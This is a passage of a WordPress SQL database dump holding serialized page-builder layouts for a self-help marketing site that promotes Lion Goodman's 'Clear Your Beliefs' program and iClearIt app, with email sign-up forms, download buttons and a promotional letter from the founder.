height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:785:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1569:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<p style="font-size: 1.1em; margin-left: 10px; margin-bottom: -23px !important;"><b>The <em>Clear Your Beliefs</em> Program… and  How and Why…</b></p>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 18px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<p style="margin-left: 10px; margin-bottom: 14px !important;"><b>How and Why It Works So Well</b></p>\n\n<ul style="margin-left: 18px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:2822:"<div id="divStroke"><p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul><li> <em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1376, 1820, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:90:"<p>[su_youtube_advanced url="http://youtu.be/NbE8INOjTKM" autohide="no" theme="light"]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1369:"<div class="three-container">[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button">	<input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1827:"<div class="three-container">[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]<center><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong><p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1177:"<div class="three-container">\n	[su_box title="Complete Program" class=''three-container'' box_color="#1a2d8c" radius="8"]<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p><form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1374, 1819, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:6:{s:3:"url";s:68:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:2:{s:5:"video";s:68:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:39:"SiteOrigin_Panels_Widgets_EmbeddedVideo";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1369:"<div class="three-container">[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button">	<input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1827:"<div class="three-container">[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]<center><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong><p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1177:"<div class="three-container">\n	[su_box title="Complete Program" class=''three-container'' box_color="#1a2d8c" radius="8"]<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p><form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion 